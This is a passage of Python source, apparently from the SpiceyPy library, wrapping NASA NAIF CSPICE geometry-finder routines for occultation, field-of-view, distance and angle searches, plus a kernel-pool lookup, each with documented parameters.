http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfbail_c.html
:return: True if an interrupt signal has been received by the GF handler.
:rtype: bool
"""
return bool(libspice.gfbail_c())
@spiceErrorCheck
def gfclrh():
"""
Clear the interrupt signal handler status, so that future calls
to :func:`gfbail` will indicate no interrupt was received.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfclrh_c.html
"""
libspice.gfclrh_c()
@spiceErrorCheck
def gfdist(target, abcorr, obsrvr, relate, refval, adjust, step, nintvls,
cnfine, result):
"""
Return the time window over which a specified constraint on
observer-target distance is met.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfdist_c.html
:param target: Name of the target body.
:type target: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Adjustment value for absolute extrema searches.
:type adjust: float
:param step: Step size used for locating extrema and roots.
:type step: float
:param nintvls: Workspace window interval count.
:type nintvls: int
:param cnfine: SPICE window to which the search is confined.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
target = stypes.stringToCharP(target)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvls = ctypes.c_int(nintvls)
libspice.gfdist_c(target, abcorr, obsrvr, relate, refval, adjust,
step, nintvls, ctypes.byref(cnfine), ctypes.byref(result))
def gfevnt():
raise NotImplementedError
@spiceErrorCheck
def gffove(inst, tshape, raydir, target, tframe, abcorr, obsrvr,
tol, udstep, udrefn, rpt, udrepi, udrepu, udrepf, bail, udbail, cnfine, result):
"""
Determine time intervals when a specified target body or ray
intersects the space bounded by the field-of-view (FOV) of a
specified instrument. Report progress and handle interrupts if so
commanded.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gffove_c.html
:param inst: Name of the instrument
:type inst: str
:param tshape: Type of shape model used for target body
:type tshape: str
:param raydir: Ray s direction vector
:type raydir: N-Element Array of floats
:param target: Name of the target body
:type target: str
:param tframe: Body fixed body centered frame for target body
:type tframe: str
:param abcorr: Aberration correction flag
:type abcorr: str
:param obsrvr: Name of the observing body
:type obsrvr: str
:param tol: Convergence tolerance in seconds
:type tol: float
:param udstep: Name of the routine that returns a time step
:type udstep: spiceypy.utils.callbacks.UDSTEP
:param udrefn: Name of the routine that computes a refined time
:type udrefn: spiceypy.utils.callbacks.UDREFN
:param rpt: Progress report flag
:type rpt: bool
:param udrepi: Function that initializes progress reporting.
:type udrepi: spiceypy.utils.callbacks.UDREP
:param udrepu: Function that updates the progress report
:type udrepu: spiceypy.utils.callbacks.UDREPU
:param udrepf: Function that finalizes progress reporting
:type udrepf: spiceypy.utils.callbacks.UDREPF
:param bail: Logical indicating program interrupt monitoring
:type bail: bool
:param udbail: Name of a routine that signals a program interrupt
:type udbail: spiceypy.utils.callbacks.UDBAIL
:param cnfine: SPICE window to which the search is restricted
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results
:type result: spiceypy.utils.support_types.SpiceCell
"""
inst = stypes.stringToCharP(inst)
tshape = stypes.stringToCharP(tshape)
raydir = stypes.toDoubleVector(raydir)
target = stypes.stringToCharP(target)
tframe = stypes.stringToCharP(tframe)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
tol = ctypes.c_double(tol)
rpt = ctypes.c_int(rpt)
bail = ctypes.c_int(bail)
libspice.gffove_c(inst, tshape, raydir, target, tframe,
abcorr, obsrvr, tol, udstep, udrefn, rpt,
udrepi, udrepu, udrepf, bail, udbail,
ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfilum(method, angtyp, target, illumn,
fixref, abcorr, obsrvr, spoint,
relate, refval, adjust, step, nintvls, cnfine, result):
"""
Return the time window over which a specified constraint on
the observed phase, solar incidence, or emission angle at
a specifed target body surface point is met.
:param method: Shape model used to represent the surface of the target body.
:type method: str
:param angtyp: The type of illumination angle for which a search is to be performed.
:type angtyp: str
:param target: Name of a target body.
:type target: str
:param illumn: Name of the illumination source.
:type illumn: str
:param fixref: Name of the body-fixed, body-centered reference frame associated with the target body.
:type fixref: str
:param abcorr: The aberration corrections to be applied.
:type abcorr: str
:param obsrvr: Name of an observing body.
:type obsrvr: str
:param spoint: Body-fixed coordinates of a target surface point.
:type spoint: 3-Element Array of floats
:param relate: Relational operator used to define a constraint on a specified illumination angle.
:type relate: str
:param refval: Reference value used with 'relate' to define an equality or inequality to be satisfied by the specified illumination angle.
:type refval: float
:param adjust: Parameter used to modify searches for absolute extrema.
:type adjust: float
:param step: Step size to be used in the search.
:type step: float
:param nintvls: Number of intervals that can be accommodated by each of the dynamically allocated workspace windows used internally by this routine.
:type nintvls: int
:param cnfine: Window that confines the time period over which the specified search is conducted. This can be updated by gfilum
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: Window of intervals in the confinement window that the illumination angle constraint is satisfied.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert isinstance(result, stypes.SpiceCell)
method = stypes.stringToCharP(method)
angtyp = stypes.stringToCharP(angtyp)
target = stypes.stringToCharP(target)
illumn = stypes.stringToCharP(illumn)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.toDoubleVector(spoint)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvls = ctypes.c_int(nintvls)
libspice.gfilum_c(method, angtyp, target, illumn,
fixref, abcorr, obsrvr, spoint,
relate, refval, adjust, step,
nintvls, ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfinth(sigcode):
"""
Respond to the interrupt signal SIGINT: save an indication
that the signal has been received. This routine restores
itself as the handler for SIGINT.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfinth_c.html
:param sigcode: Interrupt signal ID code.
:type sigcode: int
"""
sigcode = ctypes.c_int(sigcode)
libspice.gfinth_c(sigcode)
@spiceErrorCheck
def gfocce(occtyp, front, fshape, fframe, back,
bshape, bframe, abcorr, obsrvr, tol,
udstep, udrefn, rpt, udrepi, udrepu,
udrepf, bail, udbail, cnfine, result):
"""
Determine time intervals when an observer sees one target
occulted by another. Report progress and handle interrupts
if so commanded.
The surfaces of the target bodies may be represented by triaxial
ellipsoids or by topographic data provided by DSK files.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfocce_c.html
:param occtyp: Type of occultation
:type occtyp: str
:param front: Name of body occulting the other
:type front: str
:param fshape: Type of shape model used for front body
:type fshape: str
:param fframe: Body fixed body centered frame for front body
:type fframe: str
:param back: Name of body occulted by the other
:type back: str
:param bshape: Type of shape model used for back body
:type bshape: str
:param bframe: Body fixed body centered frame for back body
:type bframe: str
:param abcorr: Aberration correction flag
:type abcorr: str
:param obsrvr: Name of the observing body
:type obsrvr: str
:param tol: Convergence tolerance in seconds
:type tol: float
:param udstep: Name of the routine that returns a time step
:type udstep: spiceypy.utils.callbacks.UDSTEP
:param udrefn: Name of the routine that computes a refined time
:type udrefn: spiceypy.utils.callbacks.UDREFN
:param rpt: Progress report flag
:type rpt: bool
:param udrepi: Function that initializes progress reporting.
:type udrepi: spiceypy.utils.callbacks.UDREP
:param udrepu: Function that updates the progress report
:type udrepu: spiceypy.utils.callbacks.UDREPU
:param udrepf: Function that finalizes progress reporting
:type udrepf: spiceypy.utils.callbacks.UDREPF
:param bail: Logical indicating program interrupt monitoring
:type bail: bool
:param udbail: Name of a routine that signals a program interrupt
:type udbail: spiceypy.utils.callbacks.UDBAIL
:param cnfine: SPICE window to which the search is restricted
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
occtyp = stypes.stringToCharP(occtyp)
front = stypes.stringToCharP(front)
fshape = stypes.stringToCharP(fshape)
fframe = stypes.stringToCharP(fframe)
back = stypes.stringToCharP(back)
bshape = stypes.stringToCharP(bshape)
bframe = stypes.stringToCharP(bframe)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
tol = ctypes.c_double(tol)
rpt = ctypes.c_int(rpt)
bail = ctypes.c_int(bail)
libspice.gfocce_c(occtyp, front, fshape, fframe, back,
bshape, bframe, abcorr, obsrvr, tol,
udstep, udrefn, rpt, udrepi, udrepu, udrepf,
bail, udbail, ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfoclt(occtyp, front, fshape, fframe, back, bshape, bframe, abcorr, obsrvr,
step, cnfine, result):
"""
Determine time intervals when an observer sees one target
occulted by, or in transit across, another.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfoclt_c.html
:param occtyp: Type of occultation.
:type occtyp: str
:param front: Name of body occulting the other.
:type front: str
:param fshape: Type of shape model used for front body.
:type fshape: str
:param fframe: Body-fixed, body-centered frame for front body.
:type fframe: str
:param back: Name of body occulted by the other.
:type back: str
:param bshape: Type of shape model used for back body.
:type bshape: str
:param bframe: Body-fixed, body-centered frame for back body.
:type bframe: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param step: Step size in seconds for finding occultation events.
:type step: float
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
occtyp = stypes.stringToCharP(occtyp)
front = stypes.stringToCharP(front)
fshape = stypes.stringToCharP(fshape)
fframe = stypes.stringToCharP(fframe)
back = stypes.stringToCharP(back)
bshape = stypes.stringToCharP(bshape)
bframe = stypes.stringToCharP(bframe)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
step = ctypes.c_double(step)
libspice.gfoclt_c(occtyp, front, fshape, fframe, back, bshape, bframe,
abcorr, obsrvr, step, ctypes.byref(cnfine),
ctypes.byref(result))
@spiceErrorCheck
def gfpa(target, illmin, abcorr, obsrvr, relate, refval, adjust, step, nintvals,
cnfine, result):
"""
Determine time intervals for which a specified constraint
on the phase angle between an illumination source, a target,
and observer body centers is met.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfpa_c.html
:param target: Name of the target body.
:type target: str
:param illmin: Name of the illuminating body.
:type illmin: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Adjustment value for absolute extrema searches.
:type adjust: float
:param step: Step size used for locating extrema and roots.
:type step: float
:param nintvals: Workspace window interval count.
:type nintvals: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
target = stypes.stringToCharP(target)
illmin = stypes.stringToCharP(illmin)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvals = ctypes.c_int(nintvals)
libspice.gfpa_c(target, illmin, abcorr, obsrvr, relate, refval,
adjust, step, nintvals, ctypes.byref(cnfine),
ctypes.byref(result))
@spiceErrorCheck
def gfposc(target, inframe, abcorr, obsrvr, crdsys, coord, relate, refval,
adjust, step, nintvals, cnfine, result):
"""
Determine time intervals for which a coordinate of an
observer-target position vector satisfies a numerical constraint.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfposc_c.html
:param target: Name of the target body.
:type target: str
:param inframe: Name of the reference frame for coordinate calculations.
:type inframe: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param crdsys: Name of the coordinate system containing COORD
:type crdsys: str
:param coord: Name of the coordinate of interest
:type coord: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Adjustment value for absolute extrema searches.
:type adjust: float
:param step: Step size used for locating extrema and roots.
:type step: float
:param nintvals: Workspace window interval count.
:type nintvals: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
target = stypes.stringToCharP(target)
inframe = stypes.stringToCharP(inframe)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
crdsys = stypes.stringToCharP(crdsys)
coord = stypes.stringToCharP(coord)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvals = ctypes.c_int(nintvals)
libspice.gfposc_c(target, inframe, abcorr, obsrvr, crdsys, coord,
relate, refval, adjust, step, nintvals,
ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfrefn(t1, t2, s1, s2):
"""
For those times when we can't do better, we use a bisection
method to find the next time at which to test for state change.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrefn_c.html
:param t1: One of two values bracketing a state change.
:type t1: float
:param t2: The other value that brackets a state change.
:type t2: float
:param s1: State at t1.
:type s1: bool
:param s2: State at t2.
:type s2: bool
:return: New value at which to check for transition.
:rtype: float
"""
t1 = ctypes.c_double(t1)
t2 = ctypes.c_double(t2)
s1 = ctypes.c_int(s1)
s2 = ctypes.c_int(s2)
t = ctypes.c_double()
libspice.gfrefn_c(t1, t2, s1, s2, ctypes.byref(t))
return t.value
@spiceErrorCheck
def gfrepf():
"""
Finish a GF progress report.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrepf_c.html
"""
libspice.gfrepf_c()
@spiceErrorCheck
def gfrepi(window, begmss, endmss):
"""
This entry point initializes a search progress report.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrepi_c.html
:param window: A window over which a job is to be performed.
:type window: spiceypy.utils.support_types.SpiceCell
:param begmss: Beginning of the text portion of the output message.
:type begmss: str
:param endmss: End of the text portion of the output message.
:type endmss: str
"""
begmss = stypes.stringToCharP(begmss)
endmss = stypes.stringToCharP(endmss)
# don't do anything if we were given a pointer to a SpiceCell, like if we were in a callback
if not isinstance(window, ctypes.POINTER(stypes.SpiceCell)):
assert isinstance(window, stypes.SpiceCell)
assert window.is_double()
window = ctypes.byref(window)
libspice.gfrepi_c(window, begmss, endmss)
@spiceErrorCheck
def gfrepu(ivbeg, ivend, time):
"""
This function tells the progress reporting system
how far a search has progressed.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrepu_c.html
:param ivbeg: Start time of work interval.
:type ivbeg: float
:param ivend: End time of work interval.
:type ivend: float
:param time: Current time being examined in the search process.
:type time: float
"""
ivbeg = ctypes.c_double(ivbeg)
ivend = ctypes.c_double(ivend)
time = ctypes.c_double(time)
libspice.gfrepu_c(ivbeg, ivend, time)
@spiceErrorCheck
def gfrfov(inst, raydir, rframe, abcorr, obsrvr, step, cnfine, result):
"""
Determine time intervals when a specified ray intersects the
space bounded by the field-of-view (FOV) of a specified
instrument.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrfov_c.html
:param inst: Name of the instrument.
:type inst: str
:param raydir: Ray's direction vector.
:type raydir: 3-Element Array of Float.
:param rframe: Reference frame of ray's direction vector.
:type rframe: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param step: Step size in seconds for finding FOV events.
:type step: float
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
inst = stypes.stringToCharP(inst)
raydir = stypes.toDoubleVector(raydir)
rframe = stypes.stringToCharP(rframe)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
step = ctypes.c_double(step)
libspice.gfrfov_c(inst, raydir, rframe, abcorr, obsrvr, step,
ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfrr(target, abcorr, obsrvr, relate, refval, adjust, step, nintvals, cnfine,
result):
"""
Determine time intervals for which a specified constraint
on the observer-target range rate is met.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfrr_c.html
:param target: Name of the target body.
:type target: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Adjustment value for absolute extrema searches.
:type adjust: float
:param step: Step size used for locating extrema and roots.
:type step: float
:param nintvals: Workspace window interval count.
:type nintvals: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
target = stypes.stringToCharP(target)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvals = ctypes.c_int(nintvals)
libspice.gfrr_c(target, abcorr, obsrvr, relate, refval,
adjust, step, nintvals, ctypes.byref(cnfine),
ctypes.byref(result))
@spiceErrorCheck
def gfsep(targ1, shape1, inframe1, targ2, shape2, inframe2, abcorr, obsrvr,
relate, refval, adjust, step, nintvals, cnfine, result):
"""
Determine time intervals when the angular separation between
the position vectors of two target bodies relative to an observer
satisfies a numerical relationship.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsep_c.html
:param targ1: Name of first body.
:type targ1: str
:param shape1: Name of shape model describing the first body.
:type shape1: str
:param inframe1: The body-fixed reference frame of the first body.
:type inframe1: str
:param targ2: Name of second body.
:type targ2: str
:param shape2: Name of the shape model describing the second body.
:type shape2: str
:param inframe2: The body-fixed reference frame of the second body
:type inframe2: str
:param abcorr: Aberration correction flag
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Absolute extremum adjustment value.
:type adjust: float
:param step: Step size in seconds for finding angular separation events.
:type step: float
:param nintvals: Workspace window interval count.
:type nintvals: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
targ1 = stypes.stringToCharP(targ1)
shape1 = stypes.stringToCharP(shape1)
inframe1 = stypes.stringToCharP(inframe1)
targ2 = stypes.stringToCharP(targ2)
shape2 = stypes.stringToCharP(shape2)
inframe2 = stypes.stringToCharP(inframe2)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvals = ctypes.c_int(nintvals)
libspice.gfsep_c(targ1, shape1, inframe1, targ2, shape2, inframe2,
abcorr, obsrvr, relate, refval, adjust, step, nintvals,
ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfsntc(target, fixref, method, abcorr, obsrvr, dref, dvec, crdsys, coord,
relate, refval, adjust, step, nintvals,
cnfine, result):
"""
Determine time intervals for which a coordinate of an
surface intercept position vector satisfies a numerical constraint.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsntc_c.html
:param target: Name of the target body.
:type target: str
:param fixref: Body fixed frame associated with the target.
:type fixref: str
:param method: Name of method type for surface intercept calculation.
:type method: str
:param abcorr: Aberration correction flag
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param dref: Reference frame of direction vector of dvec.
:type dref: str
:param dvec: Pointing direction vector from the observer.
:type dvec: 3-Element Array of floats
:param crdsys: Name of the coordinate system containing COORD.
:type crdsys: str
:param coord: Name of the coordinate of interest
:type coord: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Absolute extremum adjustment value.
:type adjust: float
:param step: Step size in seconds for finding angular separation events.
:type step: float
:param nintvals: Workspace window interval count.
:type nintvals: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
target = stypes.stringToCharP(target)
fixref = stypes.stringToCharP(fixref)
method = stypes.stringToCharP(method)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
dref = stypes.stringToCharP(dref)
dvec = stypes.toDoubleVector(dvec)
crdsys = stypes.stringToCharP(crdsys)
coord = stypes.stringToCharP(coord)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvals = ctypes.c_int(nintvals)
libspice.gfsntc_c(target, fixref, method, abcorr, obsrvr,
dref, dvec, crdsys, coord, relate, refval,
adjust, step, nintvals, ctypes.byref(cnfine),
ctypes.byref(result))
@spiceErrorCheck
def gfsstp(step):
"""
Set the step size to be returned by :func:`gfstep`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsstp_c.html
:param step: Time step to take.
:type step: float
"""
step = ctypes.c_double(step)
libspice.gfsstp_c(step)
@spiceErrorCheck
def gfstep(time):
"""
Return the time step set by the most recent call to :func:`gfsstp`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfstep_c.html
:param time: Ignored ET value.
:type time: float
:return: Time step to take.
:rtype: float
"""
time = ctypes.c_double(time)
step = ctypes.c_double()
libspice.gfstep_c(time, ctypes.byref(step))
return step.value
@spiceErrorCheck
def gfstol(value):
"""
Override the default GF convergence
value used in the high level GF routines.
Default value is 1.0e-6
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfstol_c.html
:param value: Double precision value returned or to store.
:type value: float
"""
value = ctypes.c_double(value)
libspice.gfstol_c(value)
@spiceErrorCheck
def gfsubc(target, fixref, method, abcorr, obsrvr, crdsys, coord, relate,
refval, adjust, step, nintvals, cnfine,
result):
"""
Determine time intervals for which a coordinate of an
subpoint position vector satisfies a numerical constraint.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfsubc_c.html
:param target: Name of the target body.
:type target: str
:param fixref: Body fixed frame associated with the target.
:type fixref: str
:param method: Name of method type for subpoint calculation.
:type method: str
:param abcorr: Aberration correction flag
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param crdsys: Name of the coordinate system containing COORD.
:type crdsys: str
:param coord: Name of the coordinate of interest
:type coord: str
:param relate: Relational operator.
:type relate: str
:param refval: Reference value.
:type refval: float
:param adjust: Adjustment value for absolute extrema searches.
:type adjust: float
:param step: Step size used for locating extrema and roots.
:type step: float
:param nintvals: Workspace window interval count.
:type nintvals: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
assert isinstance(result, stypes.SpiceCell)
assert result.is_double()
target = stypes.stringToCharP(target)
fixref = stypes.stringToCharP(fixref)
method = stypes.stringToCharP(method)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
crdsys = stypes.stringToCharP(crdsys)
coord = stypes.stringToCharP(coord)
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvals = ctypes.c_int(nintvals)
libspice.gfsubc_c(target, fixref, method, abcorr, obsrvr, crdsys,
coord, relate, refval, adjust, step, nintvals,
ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gftfov(inst, target, tshape, tframe, abcorr, obsrvr, step, cnfine):
"""
Determine time intervals when a specified ephemeris object
intersects the space bounded by the field-of-view (FOV) of a
specified instrument.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gftfov_c.html
:param inst: Name of the instrument.
:type inst: str
:param target: Name of the target body.
:type target: str
:param tshape: Type of shape model used for target body.
:type tshape: str
:param tframe: Body-fixed, body-centered frame for target body.
:type tframe: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param obsrvr: Name of the observing body.
:type obsrvr: str
:param step: Step size in seconds for finding FOV events.
:type step: float
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:return: SpiceCell containing set of time intervals, within the confinement period, when the target body is visible
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cnfine, stypes.SpiceCell)
assert cnfine.is_double()
inst = stypes.stringToCharP(inst)
target = stypes.stringToCharP(target)
tshape = stypes.stringToCharP(tshape)
tframe = stypes.stringToCharP(tframe)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
step = ctypes.c_double(step)
result = stypes.SPICEDOUBLE_CELL(20000)
libspice.gftfov_c(inst, target, tshape, tframe, abcorr, obsrvr, step,
ctypes.byref(cnfine), ctypes.byref(result))
return result
@spiceErrorCheck
def gfudb(udfuns, udfunb, step, cnfine, result):
"""
Perform a GF search on a user defined boolean quantity.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfudb_c.html
:param udfuns: Name of the routine that computes a scalar quantity of interest corresponding to an 'et'.
:type udfuns: ctypes.CFunctionType
:param udfunb: Name of the routine returning the boolean value corresponding to an 'et'.
:type udfunb: ctypes.CFunctionType
:param step: Step size used for locating extrema and roots.
:type step: float
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
:return: result
:rtype: spiceypy.utils.support_types.SpiceCell
"""
step = ctypes.c_double(step)
libspice.gfudb_c(udfuns, udfunb, step, ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfuds(udfuns, udqdec, relate, refval, adjust, step, nintvls, cnfine, result):
"""
Perform a GF search on a user defined scalar quantity.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfuds_c.html
:param udfuns: Name of the routine that computes the scalar quantity of interest at some time.
:type udfuns: ctypes.CFunctionType
:param udqdec: Name of the routine that computes whether the scalar quantity is decreasing.
:type udqdec: ctypes.CFunctionType
:param relate: Operator that either looks for an extreme value (max, min, local, absolute) or compares the geometric quantity value and a number.
:type relate: str
:param refval: Value used as reference for scalar quantity condition.
:type refval: float
:param adjust: Allowed variation for absolute extremal geometric conditions.
:type adjust: float
:param step: Step size used for locating extrema and roots.
:type step: float
:param nintvls: Workspace window interval count.
:type nintvls: int
:param cnfine: SPICE window to which the search is restricted.
:type cnfine: spiceypy.utils.support_types.SpiceCell
:param result: SPICE window containing results.
:type result: spiceypy.utils.support_types.SpiceCell
:return: result
:rtype: spiceypy.utils.support_types.SpiceCell
"""
relate = stypes.stringToCharP(relate)
refval = ctypes.c_double(refval)
adjust = ctypes.c_double(adjust)
step = ctypes.c_double(step)
nintvls = ctypes.c_int(nintvls)
libspice.gfuds_c(udfuns, udqdec, relate, refval, adjust, step, nintvls, ctypes.byref(cnfine), ctypes.byref(result))
return result
@spiceErrorCheck
@spiceFoundExceptionThrower
def gipool(name, start, room):
"""
Return the integer value of a kernel variable from the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gipool_c.html
:param name: Name of the variable whose value is to be returned.
:type name: str
:param start: Which component to start retrieving for name.
:type start: int
:param room: The largest number of values to return.
:type room: int
:return: Values associated with name.
:rtype: list of int
"""
name = stypes.stringToCharP(name)
start = ctypes.c_int(start)
ivals = stypes.emptyIntVector(room)
room = ctypes.c_int(room)
n = ctypes.c_int()
found = ctypes.c_int()
libspice.gipool_c(name, start, room, ctypes.byref(n), ivals,
ctypes.byref(found))
return stypes.cVectorToPython(ivals)[0:n.value], bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
